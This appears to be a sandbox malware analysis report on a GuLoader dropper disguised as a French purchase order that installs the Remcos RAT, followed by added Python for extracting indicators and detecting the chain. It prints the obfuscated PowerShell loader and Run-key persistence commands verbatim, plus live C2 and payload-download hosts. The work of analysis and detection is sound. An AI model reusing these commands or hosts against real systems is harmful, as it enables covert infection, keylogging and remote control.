Windows Analysis Report
Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe

Overview

General Information

Sample name: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
Analysis ID: 1431988
MD5: edeb34f392872f3c9e220bc9dcf9ba86
SHA1: e9fb6ff7cd47ec7b08391f4c1ecc1e684bf28ff7
SHA256: 39e37a6736984b617a47818ffdbd202199c75f769821d4939f1d61dff621098d
Tags: exe

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe" MD5: EDEB34F392872F3C9E220BC9DCF9BA86)
    • powershell.exe (PID: 6472 cmdline: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6332 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 2644 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 6412 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5492 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 6908 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5996 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 5248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 3352 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 4920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6212 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 2688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6564 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6932 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 5352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 4372 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 352 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 352 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6304 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3004 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3064 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2612 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Extracted Remcos configuration. The Host:Port:Password value is three C2 entries run together without a separator: learfo55ozj01.duckdns.org:29871:0, learfo55ozj01.duckdns.org:29872:1 and learfo55ozj02.duckdns.org:29872:1; the Snort alerts below show the first of them in use (193.222.96.21:29871). The keylog settings (path AppData, file mqerms.dat) match the dropped file C:\Users\user\AppData\Roaming\mqerms.dat that Yara flags as Remcos.

{
  "Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1",
  "Assigned name": "Top",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "alpwovnb-G3F5OR",
  "Keylog flag": "1",
  "Keylog path": "AppData",
  "Keylog file": "mqerms.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Enable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
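The configuration above is more useful once its fields are turned into discrete indicators: the concatenated C2 entries, the dynamic-DNS hosts and ports to block, the mutex, the Run-key persistence that is switched on, and the on-disk path the keylog settings resolve to. The Python below is an added example written for this page, not part of the Joe Sandbox report or of any Remcos tooling. The configuration text is copied verbatim from the report; the splitting regex assumes, as holds for this sample, that the third field of each C2 entry is a single digit and that each host begins with a letter; the %APPDATA% value is a constructed assumption derived from the user profile path seen in the report.

```python
"""Turn the Remcos configuration extracted by the sandbox into indicators.

Added example for this page. REMCOS_CONFIG_JSON is copied verbatim from the
report; the APPDATA path passed to indicators() is a constructed assumption.
"""
import json
import re
from typing import Dict, List, Tuple

# Verbatim copy of the "Malware Configuration" block from the report.
REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}'''

# One C2 entry is host:port:<one-digit field>. The sandbox joined the entries
# with no delimiter, so the split relies on the third field being a single
# digit and the next host starting with a letter (assumption; true here).
C2_RECORD = re.compile(r"(?P<host>[A-Za-z0-9.-]+):(?P<port>\d{1,5}):(?P<pw>\d)")


def load_config(text: str) -> Dict[str, str]:
    """Parse the extractor's JSON; keys such as 'Setup HKCU\\Run' keep one backslash."""
    return json.loads(text)


def parse_c2_records(field: str) -> List[Tuple[str, int, str]]:
    """Recover (host, port, third-field) tuples from the concatenated C2 string."""
    return [(m["host"], int(m["port"]), m["pw"]) for m in C2_RECORD.finditer(field)]


def indicators(cfg: Dict[str, str], appdata: str) -> Dict[str, object]:
    """Derive hunting indicators from a parsed Remcos configuration.

    appdata is the value of %APPDATA% on the victim; the report's dropped-file
    list (C:\\Users\\user\\AppData\\Roaming\\mqerms.dat) is what this resolves to.
    """
    records = parse_c2_records(cfg["Host:Port:Password"])
    hosts = sorted({host for host, _, _ in records})
    ports = sorted({port for _, port, _ in records})

    keylog_file = None
    if cfg.get("Keylog flag") == "1":
        # "AppData" is Remcos shorthand for %APPDATA%; any other value is a literal path.
        base = appdata if cfg.get("Keylog path") == "AppData" else cfg.get("Keylog path", "")
        keylog_file = base.rstrip("\\") + "\\" + cfg["Keylog file"]

    run_keys = [k for k in ("Setup HKCU\\Run", "Setup HKLM\\Run") if cfg.get(k) == "Enable"]

    return {
        "c2": records,
        "hosts": hosts,
        "ports": ports,
        "dynamic_dns": [h for h in hosts if h.endswith(".duckdns.org")],
        "mutex": cfg["Mutex"],
        "run_keys": run_keys,
        "keylog_file": keylog_file,
    }


if __name__ == "__main__":
    result = indicators(load_config(REMCOS_CONFIG_JSON), r"C:\Users\user\AppData\Roaming")
    for key, value in result.items():
        print(f"{key}: {value}")
```

The mutex and the resolved keylog path are host indicators; the hosts and ports are network indicators, and because both hosts sit under duckdns.org the IP behind them (193.222.96.21 at analysis time) should be treated as transient.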
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\mqerms.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000002.00000002.2927351766.0000000009F92000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: wab.exe PID: 2644 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

System Summary

Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems)
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe"
  ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe
  ParentProcessId: 2644, ParentProcessName: wab.exe
  ProcessId: 6412, ProcessName: cmd.exe

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Details: %Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)
  EventID: 13, EventType: SetValue
  Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5492
  TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emraud

Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
  Command / CommandLine / ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
  CommandLine|base64offset|contains: DA
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\reg.exe
  ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
  ParentImage: C:\Windows\SysWOW64\cmd.exe
  ParentProcessId: 6412, ParentProcessName: cmd.exe
  ProcessId: 5492, ProcessName: reg.exe

Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems)
  EventID: 11
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6472
  TargetFilename: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe

Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems)
  Command / CommandLine / ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
  ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessId: 6472, ParentProcessName: powershell.exe
  ProcessId: 6332, ProcessName: cmd.exe

Source: Process started | Author: Florian Roth (Nextron Systems)
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe"
  ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe
  ParentProcessId: 2644, ParentProcessName: wab.exe
  ProcessId: 6412, ProcessName: cmd.exe

Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Command / CommandLine / ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
  CommandLine|base64offset|contains: v,)^
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"
  ParentImage: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
  ParentProcessId: 6516, ParentProcessName: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
  ProcessId: 6472, ProcessName: powershell.exe
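The process tree and the Sigma matches above describe a chain that process-creation and registry telemetry alone can catch: powershell.exe reads a blob from disk, slices a three-character command name out of it with SubString(57898,3) and invokes it with the call operator (.$Sciography); cmd.exe is run with "set /A 1^^0", a doubled escape character that the Dosfuscation rule keys on; wab.exe, the signed Windows Address Book binary, is hollowed to host Remcos and therefore shows powershell.exe as its parent, spawns cmd.exe and reg.exe, and relaunches itself with a /stext <Temp file> argument; and reg.exe writes a REG_EXPAND_SZ Run value whose data expands %Skraastillinger%, which is not a variable Windows defines, and pulls its payload from a custom registry key (HKCU:\Somervillite, value Efs). The Python below is an added detection example written for this page; it is not part of the Joe Sandbox report or of the Sigma rules it cites. Its events are constructed from the process tree (field names follow Sysmon event ID 1, process create, and event ID 13, registry value set); the allowlist of legitimate wab.exe parents and the set of environment variables a Run value may reference are assumptions, and the rule labels are local names rather than Sigma titles.

```python
"""Detection rules for the GuLoader -> PowerShell -> hollowed wab.exe -> Remcos chain.

Added example for this page. SAMPLE_EVENTS is constructed from the report's
process tree (not a real Sysmon export); WAB_PARENT_ALLOWLIST and KNOWN_ENV
are assumptions a deployment would tune.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Assumption: the only parent that normally launches the Windows Address Book.
WAB_PARENT_ALLOWLIST = {"explorer.exe"}
# Assumption: environment variables a Run value may legitimately expand.
KNOWN_ENV = {"SYSTEMROOT", "WINDIR", "PROGRAMFILES", "PROGRAMFILES(X86)", "APPDATA",
             "LOCALAPPDATA", "USERPROFILE", "PROGRAMDATA", "SYSTEMDRIVE", "TEMP", "TMP",
             "PUBLIC", "COMMONPROGRAMFILES", "COMMONPROGRAMFILES(X86)", "ALLUSERSPROFILE"}
# Children the genuine wab.exe has no business launching.
SHELLS = {"cmd.exe", "reg.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].strip('"').lower()


def run_value_rules(cmd_or_data: str) -> List[str]:
    """Inspect Run-value data, taken from a 'reg add ... /d "..."' command line
    or directly from the Details field of a registry SetValue event."""
    m = re.search(r'/d\s+"([^"]*)"', cmd_or_data)
    data = m.group(1) if m else cmd_or_data
    hits: List[str] = []
    # %VAR% references that Windows does not define (here %Skraastillinger%).
    unknown = {v for v in re.findall(r"%([^%\s]+)%", data) if v.upper() not in KNOWN_ENV}
    if unknown:
        hits.append("run_value_unknown_envvar:" + ",".join(sorted(unknown)))
    # Payload staged in the registry and read back at logon (HKCU:\Somervillite, value Efs).
    if re.search(r"get-itemproperty\s+-path\s+'hk", data, re.I):
        hits.append("run_value_loads_registry_payload")
    if re.search(r"-windowstyle\s+(hidden|minimized)", data, re.I):
        hits.append("run_value_hidden_window")
    return hits


def process_rules(ev: Event) -> List[str]:
    """Rules for a Sysmon event ID 1 (process create) record."""
    hits: List[str] = []
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()
    # Wab/Wabmig unusual parent or child: hollowed wab.exe started by powershell.exe, or spawning a shell.
    if image == "wab.exe" and parent not in WAB_PARENT_ALLOWLIST:
        hits.append("wab_unusual_parent")
    if parent == "wab.exe" and image in SHELLS:
        hits.append("wab_unusual_child")
    # wab.exe relaunched with /stext <Temp file>: not a switch the Address Book takes.
    if image == "wab.exe" and re.search(r"\s/stext\s", low):
        hits.append("wab_stext_dump")
    # reg.exe (directly or via cmd /c) adding a CurrentVersion\Run value.
    if re.search(r"\breg(\.exe)?\s+add\b", low) and r"\currentversion\run" in low:
        hits.append("run_key_via_reg")
        hits.extend(run_value_rules(cmd))
    # PowerShell reads a file, slices a command name out of it and calls it: .$var(...)
    if (image == "powershell.exe" and "get-content" in low and ".substring(" in low
            and re.search(r"\.\$\w+\(", cmd) and "-windowstyle hidden" in low):
        hits.append("ps_offset_loader")
    # Doubled cmd.exe escape character, as in "set /A 1^^0".
    if image == "cmd.exe" and "^^" in cmd:
        hits.append("dosfuscation")
    return hits


def registry_rules(ev: Event) -> List[str]:
    """Rules for a Sysmon event ID 13 (registry value set) record."""
    hits: List[str] = []
    if ev.get("EventType") == "SetValue" and re.search(r"\\CurrentVersion\\Run\\", ev.get("TargetObject", ""), re.I):
        hits.append("run_key_set")
        hits.extend(run_value_rules(ev.get("Details", "")))
    return hits


def analyze(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (ProcessId, rule) pairs for every rule each event trips."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        rules = registry_rules(ev) if ev.get("EventID") == "13" else process_rules(ev)
        findings.extend((ev["ProcessId"], rule) for rule in rules)
    return findings


# Constructed from the report's process tree; paths and command lines are the report's.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "1", "ProcessId": "6472", "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",
     "CommandLine": r'''"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"'''},
    {"EventID": "1", "ProcessId": "6332", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"'},
    {"EventID": "1", "ProcessId": "2644", "Image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
    {"EventID": "1", "ProcessId": "6412", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "CommandLine": r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"'''},
    {"EventID": "13", "ProcessId": "5492", "Image": r"C:\Windows\SysWOW64\reg.exe", "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emraud",
     "Details": r"%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"},
    {"EventID": "1", "ProcessId": "6908", "Image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "ParentImage": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "CommandLine": r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"'},
]

if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(pid, rule)
```

The Run-value checks fire twice here, once on the cmd.exe /c REG ADD command line (PID 6412) and again on the reg.exe SetValue event (PID 5492); a pipeline should deduplicate on the value data. The %Skraastillinger% check is the cheapest high-signal rule in the set: a Run value can only work if that variable exists, so its definition (not shown in this report) is a second artefact worth hunting for on the host.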
Timestamp: 04/26/24-07:44:24.601980 | SID: 2032776 | Source Port: 49708 | Destination Port: 29871 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/26/24-07:44:24.894704 | SID: 2032777 | Source Port: 29871 | Destination Port: 49708 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection

Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing (geoplugin.net is a public geolocation API that Remcos queries for the victim's location; the label reflects that abuse, not the service itself)
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: https://ricohltd.top/aCqwFQDQz144.bin | Avira URL Cloud: Label: malware
Source: https://ricohltd.top/aCqwFQDQz144.bin-_ | Avira URL Cloud: Label: malware
Source: learfo55ozj01.duckdns.org | Avira URL Cloud: Label: malware
Source: https://ricohltd.top/- | Avira URL Cloud: Label: malware
Source: https://ricohltd.top/ | Avira URL Cloud: Label: malware
Source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos (configuration as listed above)
Source: learfo55ozj01.duckdns.org | Virustotal: Detection: 12%
Source: ricohltd.top | Virustotal: Detection: 19%
Source: https://ricohltd.top/aCqwFQDQz144.bin | Virustotal: Detection: 18%
Source: learfo55ozj01.duckdns.org | Virustotal: Detection: 12%
Source: https://ricohltd.top/ | Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Virustotal: Detection: 27%
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Virustotal: Detection: 27%
Source: Yara match | File source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
